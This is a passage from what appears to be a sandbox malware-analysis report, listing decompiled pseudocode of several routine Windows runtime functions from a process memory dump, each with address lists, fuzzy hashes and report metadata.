				char _t88;
				intOrPtr* _t101;
				signed int _t104;
				void* _t114;

				_t88 = __edx;
				_t1 =  &_a4;
				 *_t1 = _a4 & 0x00000001;
				_v12 = __edx;
				_t101 = __ecx;
				if( *_t1 == 0) {
					L04CC2330(__ecx + 0x40, __ecx + 0x40);
					_t88 = _v16;
				}
				_t36 = _t101 + 0x44;
				_t63 = 0;
				_t104 =  *_t36;
				if(( *(_t36 + 4) & 0x00000001) != 0) {
					if(_t104 == 0) {
						_t104 = 0;
					} else {
						_t104 = _t104 ^ _t36;
					}
				}
				_t71 =  *(_t36 + 4) & 1;
				if(_t104 == 0) {
					L18:
					if(_a4 == _t63) {
						E04CC24D0(_t101 + 0x40);
						_t88 = _v16;
					}
					_push(_t63);
					_push(_t63);
					_push(_t63);
					_push(_t88);
					_t72 = 8;
					E04D75FED(_t72, _t101);
					goto L28;
				} else {
					_t41 = _t71;
					do {
						_t114 = _t88 - ( *(_t104 + 0xc) & 0xffff0000);
						if(_t114 < 0) {
							_t75 =  *_t104;
							goto L12;
						}
						if(_t114 <= 0) {
							break;
						}
						_t75 =  *(_t104 + 4);
						L12:
						if(_t41 == 0 || _t75 == 0) {
							_t104 = _t75;
						} else {
							_t104 = _t104 ^ _t75;
						}
					} while (_t104 != 0);
					_t42 = _t101 + 0x44;
					if(_t104 != 0) {
						_push(_t104);
						L04CD9B40(_t63, _t101, _t104, _t42);
						if(_a4 == _t63) {
							E04CC24D0(_t101 + 0x40);
						}
						_t76 =  *(_t104 + 0x10);
						_push( *((intOrPtr*)(_t101 + 4)));
						_push( *_t101);
						_t67 = 1 << (_t76 >> 0x00000002 & 0x0000003f);
						_push(0x8000);
						_t22 = _t67 - 1; // 0x0
						_v20 = ((_t76 >> 0x00000001 & 1) + (_t76 >> 0xc) << 0xc) - 1 + (1 << (_t76 >> 0x00000002 & 0x0000003f)) - (((_t76 >> 0x00000001 & 1) + (_t76 >> 0x0000000c) << 0x0000000c) - 0x00000001 + 1 & _t22);
						E04D78845( &_v16,  &_v20);
						asm("lock xadd [eax], ecx");
						asm("lock xadd [eax], edx");
						E04D79629(_t104,  *_t101,  *((intOrPtr*)(_t101 + 4)));
						_t106 = _v40;
						_t63 = _v40;
						if(E04CC3C40() == 0) {
							_t54 = 0x7ffe0388;
						} else {
							_t106 = _v23;
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
						}
						if( *_t54 != 0) {
							E04D6DA30(_t63, _t101, _v19, _t106);
						}
						L28:
						return _t63;
					}
					goto L18;
				}
			}

0x04d7a553
0x04d7a55e
0x04d7a55e
0x04d7a565
0x04d7a569
0x04d7a56b
0x04d7a571
0x04d7a576
0x04d7a576
0x04d7a57a
0x04d7a57d
0x04d7a583
0x04d7a585
0x04d7a589
0x04d7a58f
0x04d7a58b
0x04d7a58b
0x04d7a58b
0x04d7a589
0x04d7a595
0x04d7a59a
0x04d7a5cd
0x04d7a5d0
0x04d7a5d6
0x04d7a5db
0x04d7a5db
0x04d7a5df
0x04d7a5e0
0x04d7a5e1
0x04d7a5e2
0x04d7a5e7
0x04d7a5e8
0x00000000
0x04d7a59c
0x04d7a59c
0x04d7a59e
0x04d7a5a7
0x04d7a5a9
0x04d7a5b2
0x00000000
0x04d7a5b2
0x04d7a5ab
0x00000000
0x00000000
0x04d7a5ad
0x04d7a5b4
0x04d7a5b6
0x04d7a5c0
0x04d7a5bc
0x04d7a5bc
0x04d7a5bc
0x04d7a5c2
0x04d7a5c6
0x04d7a5cb
0x04d7a5f2
0x04d7a5f4
0x04d7a5fc
0x04d7a602
0x04d7a602
0x04d7a607
0x04d7a60c
0x04d7a613
0x04d7a628
0x04d7a62a
0x04d7a634
0x04d7a648
0x04d7a64c
0x04d7a65c
0x04d7a66c
0x04d7a677
0x04d7a67c
0x04d7a680
0x04d7a689
0x04d7a69f
0x04d7a68b
0x04d7a691
0x04d7a698
0x04d7a698
0x04d7a6a7
0x04d7a6b0
0x04d7a6b0
0x04d7a6b5
0x04d7a6bd
0x04d7a6bd
0x00000000
0x04d7a5cb

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction ID: 6d7326094078375574d74396706f71c1b26f04e26a779b2fff17232f995f4574
Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction Fuzzy Hash: 5A41A272A046169FD725CF24C884A6EB7A9FF84314B05866EE9528B744FB30FD14CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04CEA350 Relevance: .1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E04CEA350(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* _t17;
				intOrPtr* _t19;
				signed int _t23;
				void* _t29;
				signed int _t31;
				void* _t37;
				void* _t38;
				signed int _t43;
				signed int _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t52;
				void* _t55;
				intOrPtr _t57;
				signed int _t58;
				void* _t60;

				_t49 = __edx;
				_push(__ecx);
				_push(__ecx);
				_v5 = 0;
				_t55 = E04CE1CA7(__ecx);
				if(_t55 < 0) {
					L18:
					return _t55;
				}
				_push(_t37);
				_push(_t50);
				L04CC2330(_t13, 0x4da6818);
				E04CEC640(_t37, 0, _t49, _t50);
				_t43 =  *0x4da923c; // 0x0
				if(_t43 != 0) {
					_t17 = E04CF8170(_a4, _t43,  *0x4da9240, 0x14, E04CAB600);
					_t43 =  *0x4da923c; // 0x0
					_t60 = _t60 + 0x14;
					_t38 = _t17;
				} else {
					_t38 = 0;
				}
				if(_t38 != 0) {
					_t49 = _v5;
					goto L13;
				} else {
					_t46 =  *0x4da9244; // 0x0
					if(_t43 != 0) {
						_t23 =  *0x4da9240; // 0x0
						if(_t23 + 1 == _t46) {
							goto L5;
						}
						E04CE1D66(_t46, _t49, 0);
						_t48 =  *0x4da923c; // 0x0
						L12:
						_t31 =  *0x4da9240; // 0x0
						_t38 = _t31 * 0x14 + _t48;
						 *0x4da9240 = _t31 + 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t50 = _t38;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E04CE1D66(_t48, _t49, 1);
						_t43 =  *0x4da923c; // 0x0
						_t49 = 1;
						L13:
						_t57 =  *((intOrPtr*)(_t38 + 0x10));
						 *((intOrPtr*)(_t38 + 0x10)) = _a8;
						_t19 = _a12;
						if(_t19 != 0) {
							 *_t19 = _t57;
						}
						if(_t49 != 0) {
							E04CF8FB0(_t43,  *0x4da9240, 0x14, E04CAB600);
						}
						_t55 = 0;
						L17:
						E04CEC640(_t38, 1, _t49, _t50);
						E04CC24D0(0x4da6818);
						goto L18;
					}
					L5:
					if(_t46 != 0) {
						_t58 = _t46 + _t46;
					} else {
						_t58 = 0x10;
					}
					if(_t58 < _t46 || _t58 >= 0xccccccc) {
						L29:
						_t55 = 0xc0000017;
						goto L17;
					} else {
						_t47 = _t58 * 0x14;
						_t38 = E04CEC958(_t58 * 0x14);
						_v12 = _t38;
						if(_t38 == 0) {
							goto L29;
						}
						E04CE1D66(_t47, _t49, 0);
						_t52 =  *0x4da923c; // 0x0
						if(_t52 != 0) {
							E04CF88C0(_t38, _t52,  *0x4da9240 * 0x14);
							_t60 = _t60 + 0xc;
							_t29 = E04CD0130();
							_push(_t52);
							_push(0);
							if(_t29 != 0) {
								_push( *0x4da921c);
							} else {
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							}
							E04CC3BC0();
						}
						_t48 = _v12;
						 *0x4da923c = _t38;
						 *0x4da9244 = _t58;
						goto L12;
					}
				}
			}

0x04cea350
0x04cea355
0x04cea356
0x04cea358
0x04cea361
0x04cea365
0x04cea46d
0x04cea471
0x04cea471
0x04cea36b
0x04cea36c
0x04cea372
0x04cea379
0x04cea37e
0x04cea386
0x04d26413
0x04d26418
0x04d2641e
0x04d26421
0x04cea38c
0x04cea38c
0x04cea38c
0x04cea390
0x04cea474
0x00000000
0x04cea396
0x04cea398
0x04cea39e
0x04d26428
0x04d26430
0x00000000
0x00000000
0x04d26438
0x04d2643d
0x04cea3fc
0x04cea3fc
0x04cea409
0x04cea40c
0x04cea415
0x04cea416
0x04cea417
0x04cea418
0x04cea419
0x04cea41a
0x04cea41c
0x04cea41d
0x04cea41e
0x04cea41f
0x04cea420
0x04cea425
0x04cea42b
0x04cea42d
0x04cea430
0x04cea433
0x04cea436
0x04cea43b
0x04cea479
0x04cea479
0x04cea43f
0x04cea44f
0x04cea454
0x04cea457
0x04cea459
0x04cea45c
0x04cea466
0x00000000
0x04cea46c
0x04cea3a4
0x04cea3a6
0x04d26448
0x04cea3ac
0x04cea3ae
0x04cea3ae
0x04cea3b1
0x04d26489
0x04d26489
0x00000000
0x04cea3c3
0x04cea3c3
0x04cea3cb
0x04cea3cd
0x04cea3d2
0x00000000
0x00000000
0x04cea3da
0x04cea3df
0x04cea3e7
0x04d2645a
0x04d2645f
0x04d26462
0x04d26467
0x04d26468
0x04d2646c
0x04d26479
0x04d2646e
0x04d26474
0x04d26474
0x04d2647f
0x04d2647f
0x04cea3ed
0x04cea3f0
0x04cea3f6
0x00000000
0x04cea3f6
0x04cea3b1

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c573bcbc0adea9e832ffbdafb16c445fb13d23a9fd82750040aa5264e1ff02c
Instruction ID: 1e2083c091dcf5b3e0116dd00cd5f868beca310a15de191a26ae7f353c620c2a
Opcode Fuzzy Hash: 6c573bcbc0adea9e832ffbdafb16c445fb13d23a9fd82750040aa5264e1ff02c
Instruction Fuzzy Hash: CD4134B1B403119FDB18EF6AD8A1B7A7366EB8570CF04086CE9429B340E776FC1197A0

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0118 Relevance: .1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04CE0118(void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				short _t46;
				short _t49;
				signed int _t58;
				signed short _t60;
				signed char _t64;
				intOrPtr* _t74;
				intOrPtr* _t76;
				signed short _t80;
				signed short* _t82;
				signed short _t83;
				signed short _t88;
				intOrPtr _t91;
				intOrPtr _t97;
				intOrPtr* _t99;
				short _t101;
				void* _t103;

				_t76 = __ecx;
				_push(0x2c);
				_push(0x4d8c630);
				E04D07BE4(__ebx, __edi, __esi);
				_t99 = __edx;
				 *((intOrPtr*)(_t103 - 0x38)) = __edx;
				_t74 = __ecx;
				 *((intOrPtr*)(_t103 - 0x34)) = __ecx;
				if(E04CE0504(__ecx) == 0) {
					_t46 = 0xc000000d;
					L13:
					 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0x10));
					return _t46;
				}
				 *((intOrPtr*)(_t103 - 4)) = 0;
				if(E04CE0470(__edx, _t103 - 0x1c) != 0) {
					_t49 =  *((intOrPtr*)(_t103 - 0x1c));
					__eflags = _t49 - 0xc000;
					if(_t49 >= 0xc000) {
						_t49 = 0;
						 *((short*)(_t103 - 0x1c)) = 0;
						_t101 = 0xc000000d;
					} else {
						_t101 = 0;
					}
					 *((intOrPtr*)(_t103 - 0x20)) = _t101;
					_t80 =  *(_t103 + 8);
					__eflags = _t80;
					if(_t80 != 0) {
						 *_t80 = _t49;
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					E04CC24D0( *((intOrPtr*)(_t103 - 0x34)) + 8);
					_t46 = _t101;
					goto L13;
				}
				if( *_t99 == 0) {
					_t101 = 0xc0000033;
					L11:
					 *((intOrPtr*)(_t103 - 0x20)) = _t101;
					goto L12;
				}
				_t81 = _t74;
				_t101 = E04CE035F(_t74, _t99, _t76, _t103 - 0x2c, _t103 - 0x24, _t103 - 0x30, _t103 - 0x28);
				 *((intOrPtr*)(_t103 - 0x20)) = _t101;
				if(_t101 < 0) {
					goto L12;
				}
				_t91 =  *((intOrPtr*)(_t103 - 0x28));
				if(_t91 != 0) {
					_t82 =  *(_t103 - 0x30);
					_t58 =  *_t82 & 0x0000ffff;
					__eflags = _t58 - 0xffff;
					if(_t58 == 0xffff) {
						_t82[1] = _t82[1] | 0x00000001;
					} else {
						_t60 = _t58 + 1;
						__eflags = _t60;
						 *_t82 = _t60;
					}
					_t83 =  *(_t103 + 8);
					__eflags = _t83;
					if(_t83 != 0) {
						 *_t83 =  *((intOrPtr*)(_t91 + 6));
					}
					_t101 = 0;
					goto L11;
				}
				_t114 =  *((intOrPtr*)(_t103 - 0x2c)) - _t91;
				if( *((intOrPtr*)(_t103 - 0x2c)) == _t91) {
					_t101 = 0xc000000d;
					goto L11;
				}
				_t101 = 0xc0000017;
				 *((intOrPtr*)(_t103 - 0x20)) = 0xc0000017;
				_t97 = E04CE0774(_t103 - 0x30, _t114, _t81);
				 *((intOrPtr*)(_t103 - 0x28)) = _t97;
				if(_t97 == 0) {
					goto L12;
				}
				_t18 = _t97 + 0xe; // 0xe
				E04CF88C0(_t18,  *((intOrPtr*)(_t103 - 0x38)),  *(_t103 - 0x24));
				_t64 =  *(_t103 - 0x24) >> 1;
				 *(_t97 + 0xc) = _t64;
				 *((short*)(_t97 + 0xe + (_t64 & 0x000000ff) * 2)) = 0;
				if(E04CE05C0(_t74, _t74, _t97) == 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t97);
					_t101 =  *((intOrPtr*)(_t103 - 0x20));
					goto L12;
				}
				 *(_t97 + 6) = 0x0000c000 |  *(_t97 + 4);
				 *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x2c)))) = _t97;
				_t88 =  *(_t103 + 8);
				if(_t88 != 0) {
					 *_t88 =  *(_t97 + 6);
				}
				_t101 = 0;
				goto L11;
			}

0x04ce0118
0x04ce0118
0x04ce011a
0x04ce011f
0x04ce0124
0x04ce0126
0x04ce0129
0x04ce012b
0x04ce0135
0x04d20bce
0x04ce0222
0x04ce0225
0x04ce0231
0x04ce0231
0x04ce013d
0x04ce014c
0x04ce025f
0x04ce0263
0x04ce0266
0x04ce0279
0x04ce027b
0x04ce027f
0x04ce0268
0x04ce0268
0x04ce0268
0x04ce026a
0x04ce026d
0x04ce0270
0x04ce0272
0x04ce0274
0x04ce0274
0x04ce020d
0x04ce020d
0x04ce021b
0x04ce0220
0x00000000
0x04ce0220
0x04ce0155
0x04d20bd8
0x04ce020a
0x04ce020a
0x00000000
0x04ce020a
0x04ce016e
0x04ce0175
0x04ce0177
0x04ce017c
0x00000000
0x00000000
0x04ce0182
0x04ce0187
0x04ce0234
0x04ce0237
0x04ce023f
0x04ce0242
0x04ce0286
0x04ce0244
0x04ce0244
0x04ce0244
0x04ce0245
0x04ce0245
0x04ce0248
0x04ce024b
0x04ce024d
0x04ce0253
0x04ce0253
0x04ce0256
0x00000000
0x04ce0256
0x04ce018d
0x04ce0190
0x04d20bfb
0x00000000
0x04d20bfb
0x04ce0196
0x04ce019b
0x04ce01aa
0x04ce01ac
0x04ce01b1
0x00000000
0x00000000
0x04ce01b9
0x04ce01bd
0x04ce01c8
0x04ce01ca
0x04ce01d2
0x04ce01e2
0x04d20bee
0x04d20bf3
0x00000000
0x04d20bf3
0x04ce01f1
0x04ce01f8
0x04ce01fa
0x04ce01ff
0x04ce0205
0x04ce0205
0x04ce0208
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc70023edcfe16f99f3b271c5d412da2338255fec61ef7fcd5de9d4e0bc9444
Instruction ID: 8523d33dae1adbea1e62ba851f499fd0fb36abd932fc245f0576cd530c34cd1b
Opcode Fuzzy Hash: 2dc70023edcfe16f99f3b271c5d412da2338255fec61ef7fcd5de9d4e0bc9444
Instruction Fuzzy Hash: F541CE35A012299BCB10DF9BC440AFEB7B6BF48704F18816AE815E7251E7B5AD41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2670 Relevance: .1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04CF2670(intOrPtr* __ecx, intOrPtr* __edx) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __ebx;
				signed int* _t57;
				signed int _t63;
				intOrPtr _t68;
				char* _t70;
				signed int _t80;
				signed int _t89;
				signed int _t91;
				intOrPtr* _t97;
				intOrPtr _t99;
				signed int _t100;
				signed int _t101;
				signed int _t105;
				void* _t107;
				intOrPtr* _t108;
				signed int _t113;

				_t97 = __ecx;
				_v16 = __edx;
				_v12 = __ecx;
				if( *__ecx != __edx) {
					asm("sbb eax, eax");
					_t105 = 0;
					_v8 = 0;
					_t80 = 0;
					_t4 = _t97 + 0x10; // -16
					_t57 = _t4;
					_v24 = _t57;
					while(1) {
						_t113 =  *_t57;
						_v20 = _t113;
						if((_t113 >> 0x00000010 & 0x00008000) != 0) {
							goto L8;
						}
						if(_t113 == 0) {
							L27:
							L2:
							return _t105;
						}
						asm("lock cmpxchg [edx], ecx");
						_t97 = _v12;
						if(_t113 == _t113) {
							L10:
							if(_t113 == 0xffffffff) {
								goto L27;
							}
							if(_t113 == 0) {
								L26:
								 *_v24 = _t113;
								goto L27;
							}
							_t63 =  *_t97 + 0x50;
							_v28 =  ~( *(_t97 + 0x18) & 0x0000ffff);
							_v8 = _t63;
							do {
								_t107 =  *_t63;
								_t99 =  *((intOrPtr*)(_t63 + 4));
								_v32 = _t99;
								asm("lock cmpxchg8b [esi]");
								_t63 = _v8;
							} while (_t107 != _t107 || _t99 != _v32);
							_t113 = _v20;
							_t100 =  *(_v12 + 0x18) & 0x0000ffff;
							_v8 = _t100;
							_t108 = _v16 + 0x50;
							do {
								_t68 =  *_t108;
								_t89 =  *(_t108 + 4);
								_v32 = _t68;
								_v28 = _t89;
								_t101 = _t89 + 1;
								if(_t100 == 0) {
									_t101 = _t89 - 1;
								}
								_v20 = _t101;
								asm("lock cmpxchg8b [edi]");
								_t91 = _t89;
								_t100 = _v8;
							} while (_t68 != _v32 || _t91 != _v28);
							_t84 = _v12;
							 *_v12 = _v16;
							_t105 = 1;
							if(E04CC3C40() == 0) {
								_t70 = 0x7ffe0380;
							} else {
								_t70 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							if( *_t70 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E04D6EEE7(_t84,  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0xc)) + 0xc)),  *((intOrPtr*)(_t84 + 4)), ( *( *[fs:0x18] + 0xfa8) & 0x000000ff) - 1);
							}
							goto L26;
						}
						L8:
						_t80 = _t80 + 1;
						if(_t80 <= _v8) {
							_t6 = _t97 + 0x10; // -16
							_t57 = _t6;
							continue;
						}
						_t113 = _t113 | 0xffffffff;
						_v20 = _t113;
						goto L10;
					}
				}
				_t105 = 1;
				goto L2;
			}

0x04cf267a
0x04cf267d
0x04cf2680
0x04cf2685
0x04d2a165
0x04d2a16a
0x04d2a16c
0x04d2a16f
0x04d2a171
0x04d2a171
0x04d2a175
0x04d2a17d
0x04d2a17d
0x04d2a184
0x04d2a18c
0x00000000
0x00000000
0x04d2a191
0x04d2a2b1
0x04cf268e
0x04cf2692
0x04cf2692
0x04d2a1a4
0x04d2a1a8
0x04d2a1ad
0x04d2a1bb
0x04d2a1be
0x00000000
0x00000000
0x04d2a1c6
0x04d2a2ac
0x04d2a2af
0x00000000
0x04d2a2af
0x04d2a1d4
0x04d2a1d7
0x04d2a1da
0x04d2a1dd
0x04d2a1dd
0x04d2a1df
0x04d2a1e4
0x04d2a1f1
0x04d2a1fa
0x04d2a1fa
0x04d2a207
0x04d2a20a
0x04d2a214
0x04d2a217
0x04d2a219
0x04d2a219
0x04d2a21d
0x04d2a220
0x04d2a223
0x04d2a229
0x04d2a22c
0x04d2a22e
0x04d2a22e
0x04d2a231
0x04d2a23a
0x04d2a23e
0x04d2a240
0x04d2a243
0x04d2a24d
0x04d2a253
0x04d2a257
0x04d2a25f
0x04d2a271
0x04d2a261
0x04d2a26a
0x04d2a26a
0x04d2a279
0x04d2a2a7
0x04d2a2a7
0x00000000
0x04d2a279
0x04d2a1af
0x04d2a1af
0x04d2a1b3
0x04d2a17a
0x04d2a17a
0x00000000
0x04d2a17a
0x04d2a1b5
0x04d2a1b8
0x00000000
0x04d2a1b8
0x04d2a17d
0x04cf268d
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
Instruction ID: 60bbe7e330583bdd2cb44e0fd4666fe8377d9dd1642e05566385d54f4beca934
Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
Instruction Fuzzy Hash: 04516A75A00225CFCB15CF98C580AAEF7F1FF94718F2481A9D815AB391D731AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D2CE40 Relevance: .1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04D2CE40(intOrPtr __edx, intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int* _t83;
				signed int _t85;
				signed int _t91;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t105;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t120;
				signed int* _t121;
				intOrPtr* _t126;
				signed int* _t127;

				_t117 = __edx;
				_t120 = _a12;
				_v16 = 0;
				if( *_t120 == 0x120) {
					if( *((char*)(_t120 + 2)) == 1) {
						_t72 = _a8;
						if((_t72 & 0xfffffffc) == 0) {
							 *(_t120 + 8) = 0;
							 *(_t120 + 0xc) = 0;
							_t97 = _a4;
							_v20 = _t72 & 0x00000001;
							_a8 = _t72 & 0x00000002;
							do {
								_v36 =  *((intOrPtr*)(_t97 + 0x10));
								_t75 =  *((intOrPtr*)(_t97 + 0x14));
								asm("sbb ecx, [ebx+0x34]");
								_v40 = _t75;
								asm("rdtsc");
								 *((intOrPtr*)(_t120 + 0x10)) = _t75 +  *((intOrPtr*)(_t97 + 0x38)) -  *((intOrPtr*)(_t97 + 0x30));
								asm("adc edx, ecx");
								 *((intOrPtr*)(_t120 + 0x14)) = _t117;
								if(_v20 == 0) {
									L12:
									if(_a8 == 0) {
										goto L21;
									}
									_t80 =  *(_t97 + 0x20);
									_t106 =  *(_t97 + 0x24);
									_v28 = _t80;
									_v32 = _t106;
									if((_t80 | _t106) == 0) {
										L20:
										 *((char*)(_t120 + 3)) =  *((intOrPtr*)(_t97 + 0xc));
										goto L21;
									}
									_t118 = 0;
									_t108 = 1;
									_v12 = 0;
									_v8 = 1;
									if( *((intOrPtr*)(_t97 + 0xc)) <= 0) {
										goto L20;
									}
									_t83 = _t120 + 0x24;
									_t126 = _t97 + 0x48;
									_v24 = _t83;
									_t121 = _t83;
									do {
										_t85 = 0 & _v32;
										if((_t108 & _v28 | _t85) != 0) {
											 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
											 *_t121 =  *_t121 & 0x00000000;
											asm("rdpmc");
											_t118 = _v12;
											asm("adc ecx, [esi+0xc]");
											_t121[1] = _t85 -  *_t126 +  *((intOrPtr*)(_t126 + 8));
											_t121[2] = 0;
										}
										_t126 = _t126 + 0x18;
										_t108 = _v8 + _v8;
										_t121 =  &(_t121[4]);
										_t118 = _t118 + 1;
										_v8 = _t108;
										_v12 = _t118;
									} while (_t118 <  *((intOrPtr*)(_t97 + 0xc)));
									_t120 = _a12;
									goto L20;
								}
								_t127 = _t97 + 0x18;
								 *((intOrPtr*)(_t120 + 4)) =  *((intOrPtr*)(_t97 + 8));
								if(( *_t127 | _t127[1]) == 0) {
									goto L12;
								} else {
									goto L9;
								}
								do {
									do {
										L9:
										_t91 =  *_t127;
										_t114 = _t127[1];
										_t119 = _t114;
										_v12 = _t91;
										_v8 = _t114;
										asm("lock cmpxchg8b [esi]");
										_t116 = _v12;
									} while (_t91 != _t116);
									_t92 = _v8;
								} while (_t119 != _t92);
								 *(_t120 + 8) =  *(_t120 + 8) | _t116;
								 *(_t120 + 0xc) =  *(_t120 + 0xc) | _t92;
								_t97 = _a4;
								goto L12;
								L21:
								_t105 = _v16 + 1;
								_t117 =  *((intOrPtr*)(_t97 + 0x14));
								_v16 = _t105;
							} while (_v36 !=  *((intOrPtr*)(_t97 + 0x10)) || _v40 != _t117);
							_t69 = _t105 - 1; // 0x0
							 *((intOrPtr*)(_t120 + 0x18)) = _t69;
							return 0;
						}
						return 0xc00000f0;
					}
					return 0xc00000f1;
				}
				return 0xc0000206;
			}

0x04d2ce40
0x04d2ce49
0x04d2ce53
0x04d2ce59
0x04d2ce69
0x04d2ce75
0x04d2ce7d
0x04d2ce89
0x04d2ce8c
0x04d2ce98
0x04d2ce9c
0x04d2ce9f
0x04d2cea2
0x04d2cea5
0x04d2cea8
0x04d2ceb4
0x04d2ceb7
0x04d2ceba
0x04d2cebe
0x04d2cec1
0x04d2cec7
0x04d2ceca
0x04d2cf09
0x04d2cf0d
0x00000000
0x00000000
0x04d2cf0f
0x04d2cf12
0x04d2cf15
0x04d2cf1a
0x04d2cf1d
0x04d2cf7f
0x04d2cf82
0x00000000
0x04d2cf82
0x04d2cf21
0x04d2cf23
0x04d2cf24
0x04d2cf27
0x04d2cf2d
0x00000000
0x00000000
0x04d2cf2f
0x04d2cf32
0x04d2cf35
0x04d2cf38
0x04d2cf3a
0x04d2cf3f
0x04d2cf44
0x04d2cf46
0x04d2cf4a
0x04d2cf50
0x04d2cf59
0x04d2cf5c
0x04d2cf5f
0x04d2cf62
0x04d2cf62
0x04d2cf68
0x04d2cf6b
0x04d2cf6d
0x04d2cf70
0x04d2cf71
0x04d2cf74
0x04d2cf77
0x04d2cf7c
0x00000000
0x04d2cf7c
0x04d2cecf
0x04d2ced2
0x04d2ceda
0x00000000
0x00000000
0x00000000
0x00000000
0x04d2cedc
0x04d2cedc
0x04d2cedc
0x04d2cedc
0x04d2cede
0x04d2cee1
0x04d2cee3
0x04d2cee6
0x04d2ceee
0x04d2cef2
0x04d2cef5
0x04d2cef9
0x04d2cefc
0x04d2cf00
0x04d2cf03
0x04d2cf06
0x00000000
0x04d2cf85
0x04d2cf8b
0x04d2cf8c
0x04d2cf8f
0x04d2cf92
0x04d2cfa4
0x04d2cfa8
0x00000000
0x04d2cfad
0x00000000
0x04d2ce7f
0x00000000
0x04d2ce6b
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction ID: c946d7857780ccdd06c6443fc405e60a4d33f33b74718f1bee593cf2b4a426c3
Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction Fuzzy Hash: 84514871A11216DFCB18CF69C58169DBBF1FF58714B24816ED85A97305E334EA90CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04CB6074 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

